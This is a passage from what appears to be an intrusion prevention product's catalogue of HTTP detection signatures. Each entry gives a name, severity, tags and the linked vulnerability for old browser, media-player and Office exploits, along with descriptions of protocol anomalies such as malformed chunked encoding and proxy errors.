Context: HTTP Server Stream
Severity: 2
Tags: Windows, x86, CVE2006, Windows not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-325-4219
Vulnerability: Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
Description:
Back to top

HTTP_Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow

About this situation: Detects exploit attempts to playlist handling of Microsoft Windows Media Player.
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, Windows Media Player, MS2006-12, CVE2006, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-89-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability

About this situation: Attempt to exploit a code execution vulnerability in Microsoft Windows detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows XP, Windows 2000, Windows 2003, Any Hardware, MS2007-06, CVE2007, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Windows-Resource-URI-Win32-API-Code-Execution-Vulnerability
Description:
Back to top

HTTP_Microsoft-Windows-Shell-MSHTA-Script-Execution

About this situation: Detects crafted OLE Compound files that allow script code execution in Windows
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, MS2005-04, CVE2005, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-149-2032
Vulnerability: HTTP-Microsoft-Windows-Shell-MSHTA-Script-Execution
Description:
Back to top

HTTP_Microsoft-Word-For-Macintosh-Version-5-Document

About this situation: Detected Microsoft Word for Macintosh version 5 document
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Microsoft Word, Microsoft Office, MS2007-10, CVE2007, Windows not specific, Microsoft Word not specific, Microsoft Office not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-125-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Microsoft-Word-Malformed-String-Memory-Corruption
Description:
Back to top

HTTP_Microsoft-Word-Section-Table-Array-Buffer-Overflow

About this situation: Malicious Word document detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Microsoft Word, MS2007-02, CVE2007, Windows not specific, Microsoft Word not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-269-3038
Vulnerability: HTTP-Microsoft-Word-Section-Table-Array-Buffer-Overflow
Description:
Back to top

HTTP_Mimetype-Differs

About this situation: Mimetype differs
Context: SSM Context
Severity: 5
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Multipart/mimetype has a different type for different parts.
Back to top

HTTP_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution

About this situation: An attempt to exploit a vulnerability in Mozilla browsers detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
Description:
Back to top

HTTP_Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type

About this situation: Attempt to exploit code execution vulnerability in Mozilla browsers detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Netscape, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type
Description:
Back to top

HTTP_Mozilla-CSS-Moz-Binding-Cross-Site-Scripting

About this situation: Mozilla -moz-binding CSS property usage, possible XSS exploit
Context: HTTP Server Stream
Severity: 2
Tags: Windows, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2006, Windows not specific, Potential Disclosure, TCP Server Traffic
First detected in: sgpkg-ips-58-1210
Last changed: sgpkg-ips-261-3038
Vulnerability: HTTP-Mozilla-CSS-Moz-Binding-Cross-Site-Scripting
Description:
Back to top

HTTP_Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass

About this situation: Exploit against privilege restriction bypass vulnerability in the handling of chrome pages in Mozilla Firefox
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Firefox-Chrome-Page-Privilege-Restriction-Bypass
Description:
Back to top

HTTP_Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow

About this situation: Detects Mozilla Firefox CSS letter-spacing heap overflow exploits
Context: HTTP Server Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Suite, CVE2006, Any Operating System not specific, Potential Denial of Service, TCP Server Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-Firefox-CSS-Letter-Spacing-Heap-Overflow
Description:
Back to top

HTTP_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution

About this situation: Command execution exploit against Mozilla Firefox detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Netscape, Mozilla Firefox, Adobe Reader, Adobe Acrobat, MS2007-11, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
Microsoft-Windows-ShellExecute-And-IE7-Url-Handling-Code-Execution
Description:
Back to top

HTTP_Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution

About this situation: Exploit against privilege escalation vulnerability in Mozilla Firefox's JavaScript execution
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-Firefox-Privilege-Escalated-JavaScript-Execution
Description:
Back to top

HTTP_Mozilla-Firefox-Unicode-Sequence-Handling-Buffer-Overflow

About this situation: Buffer overflow exploit against Unicode sequence handling vulnerability in the Firefox/Mozilla Suite
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Firefox-Unicode-Sequence-Handling-Buffer-Overflow
Description:
Back to top

HTTP_Mozilla-IDN-Encoded-Hostname-BOF

About this situation: Attempt to exploit Mozilla-based browsers IDN encoded hostname vulnerability
Context: HTTP Server Stream
Severity: 7
Tags: Windows, Any Hardware, Mozilla based browsers, CVE2005, Windows not specific, Mozilla based browsers not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-38-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-IDN-Encoded-Hostname-BOF
Description:
Back to top

HTTP_Mozilla-Products-Overflow-Event-Handling-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Mozilla Foundation products detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla SeaMonkey, Mozilla Firefox, Mozilla Thunderbird, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Mozilla-Products-Overflow-Event-Handling-Memory-Corruption
Description:
Back to top

HTTP_Mozilla-Products-Regular-Expressions-Heap-Corruption

About this situation: Detects heap-based buffer overflow exploits against Mozilla based browsers
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, x86, Mozilla based browsers, CVE2006, Any Operating System not specific, Mozilla based browsers not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-Products-Regular-Expressions-Heap-Corruption
Description:
Back to top

HTTP_Mozilla-Suite-DOM-Property-Code-Execution

About this situation: Detects Mozilla Suite DOM property code execution exploits
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, Mozilla Suite, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Mozilla-Suite-DOM-Property-Code-Execution-Vulnerability
Description:
Back to top

HTTP_MPack-Invisible-Inline-Frame

About this situation: Attempt to redirect browser to MPack site was detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-420-4219
Vulnerability: MPack-Attack-Platform
Description:
Back to top

HTTP_MPack-JavaScript-Decoder

About this situation: Attempt to download MPack generated code was detected
Context: HTTP Server Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Generic browser, Any Operating System not specific, Generic browser not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-114-2032
Last changed: sgpkg-ips-325-4219
Vulnerability: MPack-Attack-Platform
Description:
Back to top

HTTP_Multiple-Content-Compressions

About this situation: Multiple stacked compression encodings in HTTP header
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: Multiple content compression encodings defined in HTTP header.This is valid but irrational behavior. This might indicate an evasion or denial of service attempt.
Back to top

HTTP_Multiple-Transfer-Compressions

About this situation: Multiple stacked compression encodings in HTTP header
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-858-5242
Last changed: sgpkg-ips-1531-5242
Description: Multiple transfer compression encodings defined in HTTP header.This is irrational behavior. This might indicate an evasion or denial of service attempt.
Back to top

HTTP_Not-HTTP-On-TCP

About this situation: The connection does not look like using HTTP on TCP
Context: HTTP without parameters
Severity: 1
Tags: Inspection
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-549-5211
Description: The connection does not look like using HTTP on TCP.
Back to top

HTTP_Not-HTTP-On-TLS

About this situation: The connection does not look like using HTTP on TLS
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1531-5242
Description: The connection does not look like using HTTP on TLS. This situation will not occur if the TLS connection is not decrypted.
Back to top

HTTP_Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption

About this situation: Attempt to exploit memory corruption vulnerability in Nullsoft Winamp detected
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Winamp, CVE2007, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-106-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: Nullsoft-Winamp-MP4-Files-Handling-Memory-Corruption
Description:
Back to top

HTTP_OmniWeb-JavaScript-Alert-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in OmniWeb detected
Context: HTTP Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, OmniWeb, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-OmniWeb-JavaScript-Alert-Format-String-Vulnerability
Description:
Back to top

HTTP_OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow

About this situation: Attempt to exploit heap overflow vulnerability in OpenOffice.org detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, OpenOffice.org, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow
Description:
Back to top

HTTP_Overflow-Headers

About this situation: Headers overflowed
Context: SSM Context
Severity: 8
Tags: SSM HTTP Proxy, Inspection
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The combined size of all headers is too large. Session terminated.
Back to top

HTTP_Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Panic Trasmit FTP client detected
Context: HTTP Server Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Panic Trasmit, CVE2007, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-93-1314
Last changed: sgpkg-ips-161-2032
Vulnerability: HTTP-Panic-Transmit-Ftps-Url-Handler-Heap-Buffer-Overflow
Description:
Back to top

HTTP_Pipelined-After-Connect

About this situation: Pipelined data seen while CONNECT in progress
Context: HTTP without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Description: HTTP client has sent some data before HTTP CONNECT request has been completed.
Back to top

HTTP_Pipelined-After-Upgrade-Request

About this situation: Pipelined data seen while protocol upgrade in progress
Context: HTTP without parameters
Severity: 1
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Description: HTTP client has requested protocol upgrade, to which response hasn't been seen yet, and there is pipelined data after that request. In this situation, data can't be unambigously fingerprinted as new protocol or HTTP request. This may be an evasion attempt.
Back to top

HTTP_PNG-Image-With-Large-Data-Length-Value

About this situation: PNG image with large data length value in image chunk
Context: HTTP Server Stream
Severity: 2
Tags: Windows, x86, MS2005-06, MS2006-06, CVE2005, CVE2006, Windows not specific, Possibly Unwanted Content, TCP Server Traffic
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-278-4219
Vulnerability: HTTP-Microsoft-Internet-Explorer-PNG-Image-Rendering-Buffer-Overflow
Microsoft-Windows-Media-Player-PNG-Image-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_PNG-Image-With-Large-Height-Or-Width-Value

About this situation: PNG image with large height or width value. Possible exploit against integer overflow vulnerability in Windows Media Player
Context: HTTP Server Stream
Severity: 7
Tags: Windows, x86, Windows Media Player, MS2005-02, CVE2004, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-63-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Windows-Media-Player-PNG-Processing-Integer-Overflow
Description:
Back to top

HTTP_Protocol-Upgrade-Limit-Exceeded

About this situation: Internal limit on storing HTTP Upgrade header contents exceeded
Context: HTTP without parameters
Severity: 2
Tags: Obsolete
First detected in: sgpkg-ips-554-5211
Last changed: sgpkg-ips-554-5211
Description: Length or number of protocol names in HTTP Upgrade header exceeded limit built in to the system. Some or all protocol names failed to be stored; this may cause false positives or negatives in generation of HTTP_Invalid-Server-Protocol-List situations.
Back to top

HTTP_Proxy-Authentication-Error

About this situation: HTTP proxy authentication failed
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-1633-5242
Last changed: sgpkg-ips-1633-5242
Description: An HTTP proxy request (CONNECT, GET or POST) got an error when attempting proxy authentication. An HTTP proxy request from a client can attempt proxy authentication. This situation records that the proxy authentication attempt failed. Risk analysis: Risk level is none. A proxy authenication failure does not signal any attack - it could indicate an issue with the client, an issue with the engine, or an issue with the domain controller.
Back to top

HTTP_Proxy-Authentication-Required-With-Redirection

About this situation: HTTP proxy requires authentication for redirected connection
Context: HTTP without parameters
Severity: 8
Tags: System Inspections
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description: The HTTP proxy requires authentication for a redirected connection. A HTTP connection was transparently redirected to a HTTP proxy by the access rules, but the HTTP proxy requires authentication. This is a configuration error, the transparent redirection feature can currently be used only when the proxy doesn't require authentication. The connection is terminated by default.
Back to top

HTTP_Proxy-Connection-Timeout

About this situation: HTTP proxy request timed out making upstream connection
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1607-5242
Description: An HTTP proxy request (CONNECT, GET or POST) got a timeout when making the upstream connection. An HTTP proxy request from a client contains a URL to connect to, and the engine attempts to make an upstream connection to the host in the URL This situation records that the upstream connection attempt timed out. Risk analysis: Risk level is none. An upstream connection timeout does not signal any attack - it could indicate an issue with the client, or an issue with the upstream server.
Back to top

HTTP_Proxy-DNS-Lookup-Error

About this situation: HTTP proxy request got DNS lookup error
Context: HTTP without parameters
Severity: 8
Tags: Protocol Information
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1607-5242
Description: An HTTP proxy request (CONNECT, GET or POST) got a DNS lookup error. An HTTP proxy request from a client contains a URL to connect to, and the engine must do a DNS lookup to resolve the hostname in the URL in order to make the connection. This situation records that the DNS lookup failed. Risk analysis: Risk level is none. A DNS lookup failure does not signal any attack - it could indicate an issue with the client, or an issue with the DNS infrastructure.
Back to top

HTTP_Proxy-Redirection-Failed

About this situation: Redirecting a connection to HTTP proxy failed
Context: HTTP without parameters
Severity: 8
Tags: System Inspections
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1531-5242
Description: Redirecting a connection to HTTP proxy failed An attempt was made to transparently redirect a HTTP connection to a HTTP proxy as defined in the access rules, but the required URL modifications failed. The connection is terminated by default.
Back to top

HTTP_ProZilla-FTPSearch-Buffer-Overflow

About this situation: Exploit against buffer overflow vulnerability in the FTPSearch functionality in ProZilla
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, ProZilla, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: ProZilla-FTPSearch-Buffer-Overflow
Description:
Back to top

HTTP_PSH-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1857-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_PSU-Shared-Variables

About this situation: This fingerprint sets shared variables
Context: HTTP Request Header Line
Severity: 1
Tags: Any Operating System, Any Hardware, Any Operating System not specific, System Inspections, TCP Client Traffic
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1864-5242
Vulnerability: Generic-Shared-Variables
Description:
Back to top

HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution

About this situation: RDS.Dataspace ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2006-04, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-97-1314
Last changed: sgpkg-ips-249-3038
Vulnerability: RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
Description:
Back to top

HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-2

About this situation: RDS.Dataspace ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2006-04, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-187-2032
Vulnerability: RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
Description:
Back to top

HTTP_RDS.Dataspace-ActiveX-Control-Remote-Code-Execution-3

About this situation: RDS.Dataspace ActiveX Control detected
Context: HTTP Server Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft Data Access Components, MS2006-04, CVE2006, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-195-2032
Last changed: sgpkg-ips-195-2032
Vulnerability: RDS.Dataspace-ActiveX-Control-Remote-Code-Execution
Description:
Back to top

HTTP_RealNetworks-SMIL-Wallclock-Stack-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in RealNetworks Helix Player and RealPlayer detected
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, Helix Player, CVE2007, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-148-2032
Vulnerability: RealNetworks-SMIL-Wallclock-Stack-Overflow
Description:
Back to top

HTTP_RealPlayer-AVI-Parsing-Buffer-Overflow

About this situation: Detects malformed AVI files that could cause a buffer overflow in Realplayer
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Rhapsody, RealPlayer, RealOne Player, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-RealPlayer-AVI-Parsing-Buffer-Overflow
Description:
Back to top

HTTP_RealPlayer-RAM-File-Processing-Buffer-Overflow

About this situation: Detects buffer overflow exploits against Realplayer
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, RealOne Player, Helix Player, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-66-1210
Last changed: sgpkg-ips-405-4219
Vulnerability: HTTP-RealPlayer-RAM-File-Processing-Buffer-Overflow
Description:
Back to top

HTTP_RealPlayer-Realpix-And-Realtext-Format-String-Compromise

About this situation: Attempt to exploit RealPlayer format string vulnerability
Context: HTTP Server Stream
Severity: 7
Tags: Unix, Any Hardware, RealPlayer, CVE2005, Unix not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-40-1210
Last changed: sgpkg-ips-256-3038
Vulnerability: HTTP-RealPlayer-Realpix-And-Realtext-Format-String-Compromise
Description:
Back to top

HTTP_RealPlayer-SMIL-Screen-Size-System-Compromise

About this situation: RealPlayer .SMIL screen size parameter buffer overflow exploit
Context: HTTP Server Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RealPlayer, RealOne Player, CVE2005, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Server Traffic
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-RealPlayer-SMIL-Screen-Size-System-Compromise
Description:
Back to top

HTTP_Reply-Chunked-Encoded-Chunk-Unparseable

About this situation: Chunked-encoded chunk length unparseable
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-241-3038
Description: The chunk length could not be interpreted in an HTTP server reply that used "chunked" transfer encoding. The start of the possible next HTTP response, chunk header, or chunk trailer cannot be detected reliably. The rest of the stream is handled as HTTP response body data. Risk analysis: Risk level is medium. This may be an evasion attempt where an IDS would interpret the communication differently than the client. Alternatively, this may be an attack attempt against the clients's handling of "chunked" transfer encoding.
Back to top

HTTP_Reply-Chunked-Encoding-Extra-Data-Before-Chunk-Header

About this situation: Extra data before a chunk header seen in HTTP server reply
Context: HTTP without parameters
Severity: 5
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: The HTTP server sent a reply containing a body encoded with the "chunked" transfer encoding, inserting extra characters not mandated or allowed by the HTTP specification in front of a chunk header. Chunk headers start with, and most often only consist of, a hexadecimal number indicating the length of the chunk data in bytes. No data is allowed between the end of a chunk and the start of the header of the following chunk. Such extra data could be used as an evasion attempt by taking advantage of the fact that the protocol inspector and the final receiving end may interpret the confusing chunk structure differently, perhaps allowing the receiver to see the disguised payload as content even though the protocol inspector does not.
Back to top

HTTP_Reply-Chunked-Encoding-Negative-Chunk-Length

About this situation: Negative chunk length seen in HTTP server reply
Context: HTTP without parameters
Severity: 7
Tags: Attack Related Anomalies
First detected in: sgpkg-ips-1044-5242
Last changed: sgpkg-ips-1044-5242
Description: The HTTP server sent a reply containing a body encoded with the "chunked" transfer encoding, including a chunk whose length is nonsensically announced negative in the chunk header. Negative data size is not a meaningful concept. There is a high probability that a negative chunk length is a DoS or evasion attempt, aimed to cause a failure in the receiving end or to evade inspection by forcing the protocol inspector to desynchronize with the stream. As the real size of a negative length chunk could be anything, and the parsing of chunked transfer encoding is entirely dependent on the correctness of the chunk headers with no reliable way to independently figure out the real size of the chunk or the boundaries of any of the following chunks, the parsing of the protocol will stop after this situation has occurred, and any incoming data will continue to be fingerprinted in the HTTP Server Stream context only. Because of this and the highly suspicious nature of the anomaly, this situation should always be set to terminate the connection. If the connection is not terminated, the loss of structured protocol inspection will make the attacker's next steps significantly easier.
Back to top

HTTP_Reply-Chunked-Encoding-No-Terminating-Chunk

About this situation: No terminating chunk ending a chunked-encoded message body seen in HTTP server reply
Context: HTTP without parameters
Severity: 5
Tags: Protocol Information
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1041-5242
Description: The HTTP server sent a reply containing a body encoded with the "chunked" transfer encoding, but did not end the transmission properly with a terminating chunk. When the chunked transfer encoding is used, the message body is sent in pieces called "chunks", with a header in front of every chunk indicating its size. The end of message is signaled using a final terminating chunk with a length of zero. If the terminating chunk is not sent, there is no way for the receiver to know if all of the message has been successfully received.
Back to top

HTTP_Reply-Connection-Unparseable

About this situation: Contents of reply header Connection field unparseable
Context: HTTP without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-201-2032
Description: The HTTP server sent the Connection field in an unrecognized format. The HTTP header field Connection controls whether the connection is Keep-Alive or not. Interpreting the Connection header field is necessary to track an HTTP connection. If the Connection field uses an unrecognized format, it cannot be known whether the WWW server expects a Keep-Alive connection or not. Risk analysis: Risk level is low. This may be an evasion attempt where an IDS interprets the communication differently than the WWW server.
Back to top

HTTP_Reply-Content-Length-Duplicate

About this situation: Reply header Content-Length field seen twice
Context: HTTP without parameters
Severity: 5
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: Duplicate Content-Length field. The Content-Length field is one of the most common methods to describe the length of the sent data the client should expect. Interpreting the Content-Length header field is necessary to track an HTTP reply. If duplicate Content-Length fields are seen, IPS cannot determine which one the client will use, and IPS can behave differently than the client does. Risk analysis: Risk level is medium. This may be an evasion attempt where an IPS interprets the communication differently than the client.
Back to top

HTTP_Reply-Content-Length-Unparseable

About this situation: Unparseable Content-Length field
